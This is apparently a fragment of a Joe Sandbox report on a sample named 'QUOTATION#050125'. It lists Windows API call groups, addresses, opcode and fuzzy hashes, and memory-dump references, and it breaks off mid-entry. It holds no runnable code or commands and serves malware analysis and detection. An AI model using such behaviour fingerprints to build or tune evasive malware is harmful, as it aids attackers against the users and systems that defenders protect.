                                                                                      • API String ID: 847901565-0
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 000FCDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FCDE9
                                                                                        • Part of subcall function 000F3820: RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000FCE0F
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FCE31
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1794362364-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00121A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A8A
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 811310a1a073faea1d2f31a124a8ff5fb0b913483f95f63b88b2af4e1bb4b92e
                                                                                      • Instruction ID: 2a1c6cc10cb1535b7567c54c1578c6e0190e2377408007e2864dc69f3e32ea59
                                                                                      • Opcode Fuzzy Hash: 811310a1a073faea1d2f31a124a8ff5fb0b913483f95f63b88b2af4e1bb4b92e
                                                                                      • Instruction Fuzzy Hash: 7411273A901229FFEB10DBA4C985FADBB79EB18750F2000A1EA00B7290D7716E50DB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 0012E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 0012E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0012E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0012E24D
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 3d734a48f17922cf81408f9437a9ed0347efa1c29a1790564d02ed5847dd1a2a
• Instruction ID: 4b048ef6537beb9f3771a9c4f19a2ca6e3e785e662c5c371fd38efd24893f06f
• Opcode Fuzzy Hash: 3d734a48f17922cf81408f9437a9ed0347efa1c29a1790564d02ed5847dd1a2a
• Instruction Fuzzy Hash: 36110876904365FFC7019FA8AC05A9E7FADEB45321F10421AF925E7691D3708A808BA0
APIs
  • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
• GetClientRect.USER32(?,?), ref: 00159F31
• GetCursorPos.USER32(?), ref: 00159F3B
• ScreenToClient.USER32(?,?), ref: 00159F46
• DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00159F7A
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 7d27850be2ca19ba5cd471b81016308e304606d0160971b6c243623f448f5e5e
• Instruction ID: 3af81749f620605511d4e4df0fb64f1527545c141a53049cebc88f816d47ae4e
• Opcode Fuzzy Hash: 7d27850be2ca19ba5cd471b81016308e304606d0160971b6c243623f448f5e5e
• Instruction Fuzzy Hash: F911183290021AEFDB10DFA9D8859EE7BB9FB45312F400456F921EB551D730BA85CBE2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
• GetStockObject.GDI32(00000011), ref: 000C6060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 43ad090990e3f323d80fdff850e9843c3206a44b05aad776b21f13872f2660f9
• Instruction ID: 1287eeaf26e87f2f87df580236384bf742f0935efe4cb483226055f0253edbeb
• Opcode Fuzzy Hash: 43ad090990e3f323d80fdff850e9843c3206a44b05aad776b21f13872f2660f9
• Instruction Fuzzy Hash: DA115E72501609FFEF224F949C54FEF7BA9EF1C355F150115FA1466150D732ACA09B90
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000C13C6,00000000,00000000,?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue), ref: 000F30A5
• GetLastError.KERNEL32(?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue,00162290,FlsSetValue,00000000,00000364,?,000F2E46), ref: 000F30B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue,00162290,FlsSetValue,00000000), ref: 000F30BF
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: ff07ab37262f860fc2557e2879dcb3638503e50973fbb78ceb9241d9035d9ae2
• Instruction ID: 53ac30f2727a46e474d74fc2f41a2414431a5e6f4fad5538246ab4a681c15bc7
• Opcode Fuzzy Hash: ff07ab37262f860fc2557e2879dcb3638503e50973fbb78ceb9241d9035d9ae2
• Instruction Fuzzy Hash: 0801D43230132AEFCB714AB99C54A7B7BD8AF05BB1B100621FA05E7A40CF21D981D6E0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0012747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00127497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001274AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001274CA
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: e0d782357d96183525a9970bf71ad673c62f5da785eb7c7dd8b19098ab955b4d
• Instruction ID: 9d8086fe413ae227ab718cfb27d500ed43ed01ce1fa985791dede7bef7940d57
• Opcode Fuzzy Hash: e0d782357d96183525a9970bf71ad673c62f5da785eb7c7dd8b19098ab955b4d
• Instruction Fuzzy Hash: 1011C0B1209360EFE720AF14EC08FA37FFCEB00B00F108569A616DA591D7B0E954DBA1
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B126
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 127bae2073eef5212a4aec2389173524c9b03542aa48fa38a4bda71aba130080
• Instruction ID: 8b604d23a39c10258e0c71522f56c6206ee31d21a667480fc0f9c3630310d499
• Opcode Fuzzy Hash: 127bae2073eef5212a4aec2389173524c9b03542aa48fa38a4bda71aba130080
• Instruction Fuzzy Hash: 0E113C71C05A39DBCF04AFA4F9A86EEBB78FF09711F114085D941B6141CB3056608B95
APIs
• GetWindowRect.USER32(?,?), ref: 00157E33
• ScreenToClient.USER32(?,?), ref: 00157E4B
• ScreenToClient.USER32(?,?), ref: 00157E6F
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00157E8A
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 47c7042000d0ff6a0e89fa9e5e34e3cefcc10b5a25749bbaf7112c66411c214f
• Instruction ID: 20b76d947c6cba400b91e069236fd0eb6c71874a52d5f973648dc3b81018dc83
• Opcode Fuzzy Hash: 47c7042000d0ff6a0e89fa9e5e34e3cefcc10b5a25749bbaf7112c66411c214f
• Instruction Fuzzy Hash: 151163B9D0024AEFDB41CF98C8859EEBBF5FB08311F104056E911E6610D734AA94CF90
APIs
• EnterCriticalSection.KERNEL32(0019070C,?,?,000D8747,00192514), ref: 000E0202
• LeaveCriticalSection.KERNEL32(0019070C,?,000D8747,00192514), ref: 000E0235
• SetEvent.KERNEL32(00000000,00192514), ref: 000E02C3
• ResetEvent.KERNEL32 ref: 000E02CF
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CriticalEventSection$EnterLeaveReset
• String ID:
• API String ID: 3553466030-0
• Opcode ID: aabf99638b5ead2e3d1be7808205fcc78ce850c079887468be1c7ee0ea2b492e
• Instruction ID: b9ed6c3a0d77ddf0254ac204dc34c14a10544dd2220b43e3678838073ed0a2f8
• Opcode Fuzzy Hash: aabf99638b5ead2e3d1be7808205fcc78ce850c079887468be1c7ee0ea2b492e
• Instruction Fuzzy Hash: 3C011639A01320DFCB099F98FD4895977E5EB497A1B01002AFA429BB20CB706D80CFE4
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00122DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00122DD6
• GetCurrentThreadId.KERNEL32 ref: 00122DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00122DE4
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fe62b11faf6eebfd1ff1998d2e3d8a3bbba2f1127e531f70895fa90fb17243ff
• Instruction ID: 5380fb42fb313400a98b59ace4d83c881a7bb8eea34c155c187364d76db16aaa
• Opcode Fuzzy Hash: fe62b11faf6eebfd1ff1998d2e3d8a3bbba2f1127e531f70895fa90fb17243ff
• Instruction Fuzzy Hash: 50E06D72101338BBD7201BB2AC0DEEB3E6CEB42BA2F000015F105D95809AA48980C6F0
                                                                                      APIs
                                                                                        • Part of subcall function 000D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                        • Part of subcall function 000D9639: BeginPath.GDI32(?), ref: 000D96B9
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00158887
                                                                                      • LineTo.GDI32(?,?,?), ref: 00158894
                                                                                      • EndPath.GDI32(?), ref: 001588A4
                                                                                      • StrokePath.GDI32(?), ref: 001588B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      • Opcode ID: b162f5da58bd7644744c4d41e9fe985549d364f8696e15ff2416bd6e9d59aca3
                                                                                      • Instruction ID: 6545be7ec4a0f443d010cb5797108fecc51821cead222d374c7e470d1698f754
                                                                                      • Opcode Fuzzy Hash: b162f5da58bd7644744c4d41e9fe985549d364f8696e15ff2416bd6e9d59aca3
                                                                                      • Instruction Fuzzy Hash: 7DF05E3A041359FEDB126F94AC09FCE3F59AF06312F048001FA21694E2C7755591CFE5
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E0AAF
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000E0ABE
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000E0AC7
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000E0AD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: d44b09179d414c14993d4d12f9aeed63f70c722546a19ad929b46fb82f321eed
                                                                                      • Instruction ID: c507130b1bc8665dffe7918d6510589fa850c586a329be5d3f02867887d632e1
                                                                                      • Opcode Fuzzy Hash: d44b09179d414c14993d4d12f9aeed63f70c722546a19ad929b46fb82f321eed
                                                                                      • Instruction Fuzzy Hash: 93F04D71C1030DEFCB00DFB4D989A9EBBF8FF18206F518896A412EA550D674AB44DB91
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 000D98CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 000D98D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000D98E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 000D98F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      • Opcode ID: 39645783c03668560f5a75dd4a5b5b7dfed226c259317220db9cef907625adf1
                                                                                      • Instruction ID: baa82235b9ca9b3b9af8662e25601c4e15d631cbe32a8aa3b1eb3dad159c1b06
                                                                                      • Opcode Fuzzy Hash: 39645783c03668560f5a75dd4a5b5b7dfed226c259317220db9cef907625adf1
                                                                                      • Instruction Fuzzy Hash: 6CE06D31244780EEDB215F78AC09BE83F61AB52336F04822AF6FA585E1C77146809B21
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00121634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,001211D9), ref: 0012163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001211D9), ref: 00121648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,001211D9), ref: 0012164F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      • Opcode ID: fe09611abc96e9289b93defb5327a4392ac0b843650aa8afca744ecf548353d7
                                                                                      • Instruction ID: 17a9d7aa1a0c289c449be4845a2e8ace485ab1f83db82fc57ea32d14d129dadf
                                                                                      • Opcode Fuzzy Hash: fe09611abc96e9289b93defb5327a4392ac0b843650aa8afca744ecf548353d7
                                                                                      • Instruction Fuzzy Hash: EFE04F75602321EFD7601FA0AD0DB4B3B68AF54B92F144808F245CD080D7644480C790
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0011D858
                                                                                      • GetDC.USER32(00000000), ref: 0011D862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011D882
                                                                                      • ReleaseDC.USER32(?), ref: 0011D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 39e853c2837c7551c4b2944be67eb4dec6ca6df04b817a8b29fc40e3a0af8d8d
                                                                                      • Instruction ID: 9a3924759927e36a0dca458ba588ee91214ebe4874df88ef21ea076839b43e28
                                                                                      • Opcode Fuzzy Hash: 39e853c2837c7551c4b2944be67eb4dec6ca6df04b817a8b29fc40e3a0af8d8d
                                                                                      • Instruction Fuzzy Hash: 62E01AB4800304DFCF419FA0D808A6DBBB1FB08312F108019F80AEB750C7384A82EF90
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0011D86C
                                                                                      • GetDC.USER32(00000000), ref: 0011D876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011D882
                                                                                      • ReleaseDC.USER32(?), ref: 0011D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 3a953013b4ff34061b98cfb0fe1c8679e0148057d477d9d6b51dfc50a572b53c
                                                                                      • Instruction ID: 08a75bbb2edbfb1cc04651fac4bcf8c057427ab7c7a0fbd6f2482ec3e94e6f0e
                                                                                      • Opcode Fuzzy Hash: 3a953013b4ff34061b98cfb0fe1c8679e0148057d477d9d6b51dfc50a572b53c
                                                                                      • Instruction Fuzzy Hash: BBE09A75800304DFCF519FA0D808A6DBBB5FB48712B148459F94AEB750C7385A42EF90
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 001394E5
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00139585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 3924019920-3081909835
                                                                                      • Opcode ID: 9b65c6254333cd56f3d15b8982bbe96752d149b53435fb28e30a46fac2db2524
                                                                                      • Instruction ID: 0547a395e86a7e0e2b814b578077bf1b9d020eb49b106e16dfb5cd973466fecb
                                                                                      • Opcode Fuzzy Hash: 9b65c6254333cd56f3d15b8982bbe96752d149b53435fb28e30a46fac2db2524
                                                                                      • Instruction Fuzzy Hash: E3E16B716083409FD724EF24C885BAEB7E4BF85314F04896DF8899B2A2DB71DD45CB92
                                                                                      APIs
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00134ED4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
